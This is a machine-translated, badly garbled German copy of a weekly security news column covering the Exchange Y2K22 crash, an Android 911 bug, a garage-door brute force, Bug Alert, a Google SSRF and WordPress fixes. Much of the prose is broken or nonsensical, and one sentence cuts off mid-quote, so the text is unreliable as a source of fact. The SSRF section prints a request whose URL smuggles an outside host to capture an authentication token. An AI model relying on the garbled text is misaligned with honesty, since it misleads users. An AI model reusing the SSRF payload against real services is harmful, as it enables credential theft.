Elektrothermisches Design Teil 1: Digitale Elektronik Uncategorized Diese Woche in Sicherheit: Y2K22, unbeabsichtigt blockierender 911 sowie Bug Alert

Diese Woche in Sicherheit: Y2K22, unbeabsichtigt blockierender 911 sowie Bug Alert

, wenn Sie das Unglück auf Microsoft Exchange-Server in der letzten Woche ausführen lassen, dann erfordern Sie mir nicht, um Ihnen von dem y2k22-Problem zu erzählen . Um den Rest von uns aufzunehmen, wenn der Austausch versucht hat, das Update der Erste Malware-Definitionen von 2022 herunterzuladen, löste die Versionsnummer der neuen Definitionen einen Unfall in der Schadprogramm-Erfassungsmaschine aus. Das Datum ist als String 2201010001 dargestellt, in dem die ersten beiden Ziffern das Jahr repräsentieren. Diese Zeichenfolge wird in eine unterschriebene lange Ganzzahl umgewandelt, die mit 2.147.483.647 max. Die Integer überläuft sowie das Ergebnis ist undefiniertes Verhalten, das den Motor stürzt. Der Server stoppt auf, um sicher zu funktionieren, ohne dass ein beliebiger Typ von Nachrichten ohne eine funktionierende Malware-Engine verarbeitet wird, was bedeutet, dass keine E-Mails durchgeht. Erfreuliches neues Jahr!

Android 911 Denial of Service

Das Wählen von 911 für Emergency Services ist für einen Software-Anwendungsfehler ziemlich die schlechteste Zeit, um sich zu manifestieren. Google hat gerade einen solchen Fehler im Januar-Android-Update behoben. Es ist eines dieser seltsamen unbeabsichtigten App-Interaktionen – in dieser Situation löst Microsoft Teams den Android-Fehler aus. Wenn die Teams-App installiert ist, erzeugt jedoch kein Konto eingeloggt, erzeugt Teams sowie registriert einen neuen PhoneAccount-Element bei jedem Start. Dies scheint, als ob es selten sein sollte, aber auch Teams auf Android sind ebenfalls berüchtigt, um das Individuum spontan zu loggen. Wenn Sie 911 wählen, läuft Android eine Routine, um zu identifizieren, welche PhoneAccount verwendet werden sollte, um den Anruf auf den Weg zu verwenden, und löst Krawatten durch den Vergleich von Hashes. Dieser Vergleich ist nur eine naive Subtraktion, was bedeutet, dass es eine Möglichkeit von 50% besteht, ein ungünstiges Ergebnis zu erhalten. Dies war unerwartet, was zum Absturz führte.

Garagentor Reverse Engineering

Reverse Engineering Ein 30-jähriger drahtloser Autorisierungsplan ist möglicherweise nicht das interessierendste PROMBING-Feat. In einigen Fällen ist die Reise in einigen Fällen seine eigene Belohnung. [Maxwell Dulin] bringt uns die Geschichte und diese Reise ist auf jeden Fall wert. Die Grundlagen dieses Hacks sind sicherlich noch dabei und beginnen mit einem Blick auf die Hardware. Die Garagentor ist mit dem Garagentor-Opener synchronisiert, indem Sie einen Drucktasten auf dem Empfänger halten, während Sie einen Code senden. Innerhalb des Openers gibt es neun DIP-Schalter mit jeweils drei Positionen. Was machen Sie? Er zog seine zuverlässige SDR heraus, um den Webverkehr zu erhalten, sowie versuchen, die Signale zu decodieren. Inspectrum sowie Gnu Radio waren hier die Helden, wodurch ein Einblick in dieses Easy-Auth-Schema führte. Der letzte Gedanke über diese eigentliche Garagentor? Sie können einen unbekannten Code mit einem unbekannten Code bringen, indem Sie alle möglichen Combo senden, und nur 104 Minuten dauert.

Bugalert.

Wenn Sie ein Sysadmin sind, verstehen Sie, dass einige Probleme anrufen, um eine sofortige Aktion zu erhalten. Wenn Sie Java-Server liefen, war die Anfälligkeit von log4j ein Kündigungstest Ihres Reaktionsprotokolls. Die Zeit zwischen der öffentlichen Offenlegung sowie wann immer Sie davon gehört haben, war möglicherweise ausreichend, um die Katastrophe abzubauen. Während es mehrere Fehlerberichterstattungsdienste sowie Frameworks gibt, passt nichts lieber diese Nische verwenden Sie den Fall: Benachrichtigen Sie sich so schnell wie möglich, dass Ihre Haare wirklich in Brand sein können. Diese ungefüllte Nische hängte sich an [Matthew Sullivan], der ein neues Projekt offenbart hat, Wanzenalarm. Es ist alles offene Quelle, sodass Sie Ihren eigenen Fall halten können, wenn Sie wirklich möchten. Sie können sich entscheiden, einen Tweet, einen Text oder einen sogar anrufenden Anruf zu erhalten. Dies hat den Interessenten, ein hilfreiches Werkzeug zu sein, einen Blick darauf werfen!

Ich fühle mich, als würde ich Anforderung anfordern, dass der Bug Alert ein bestimmtes merkwürdiges Al-Song eingestellt ist …

Der Zombie SSRF.

[David SCHÜTZ] suchte nach dunklen Google-APIs sowie gefundene Jobs.Googleapis.com, die Sie selbst demo demo dominieren können. Diese Demo ist interessant, da es kein völlig flasched-out-Service ist, spricht jedoch mit dem echten Backend. Die Anfragen gehen mit einem Proxy, CXL-Services.appSpot.com, der den Authentifizierungsschritt für die Demo-Seite übernimmt. Wenn er eine serverseitige Anforderungsfälschung (SSRF) aufstellen kann, kann er möglicherweise in den authentifizierten Anfragen gelangen, sowie vielleicht Technik des Proxy in den Senden des Webverkehrs in seinem Namen. URL Parsing ist schwer. Die Technik, die funktionierte? Ein Backslash in der URL. Holen Sie sich /proxy?url=https://sfmnev.vps.xdavidhu.me@jobs.googleapis.com/ http / 1.1

Mit einem Gain-Zugang zum Token in der Hand begann [David] gründlich andere Google-APIs anzusehen, um zu sehen, was dieses Token ergab, was ihm den Zugang zu erreichen sei. Er bietet die Ware, die wir vorher abgedeckt haben, vorsichtig sein, genau wie weit Sie drücken. Er hätte den Bug am besten gemeldet haben, wollte jedoch bestätigen, dass er wirklich einen Online-Zugang zum Token hatte. Nach der Bestätigung des Tokens half er den Zugang um den Zugang zu, wandte sich das Fund zu, sowie ein extrem gutes 3133,70 US-Dollar. Das ist alles, was es ist, richtig? Nö. Kurz vor der 90-Tage-Offenlegungsfrist fand [David] einen Reparaturbypass. AddiNG Jede Art von Text zwischen dem Backslash sowie @ reichte aus, um es zu brechen. eins mehr $ 3133.70. Nur zum Spaß untersuchte er die alten URLs, die nach dem Fix nicht in Betrieb sein sollte. Ja, er entdeckte noch ein weiteres Sicherheits- und Sicherheitstoken sowie nettelter $ 3133.70. Dieser Zombie SSRF ist immer noch nicht tot, wie auf Twitter bewiesen:

WordPress-Update.

Wenn Sie Ihre WordPress-Instanz nicht eingerichtet haben, um automatisch zu aktualisieren, ist es Zeit, auf die neueste Version zu inspizieren. Hier gibt es vier potenziell schädliche Probleme, obwohl die Details an diesem Punkt knapp sind. Sehr erster UP ist eine Sicherheitsanfälligkeit mit einer Anfälligkeit von Cross-Site in Publish Slugs, dem Teil der URL, der dem Veröffentlichungsnamen entspricht. Das diskutierte zweite Problem ist in einigen Multisite-Konfigurationen eine Positionsinjektion. Die letzten beiden Schwachstellen sind SQL-Injektionen, die das “Welches Jahr ist es sicherlich verdienen? Meme.

Leave a Reply

Your email address will not be published. Required fields are marked *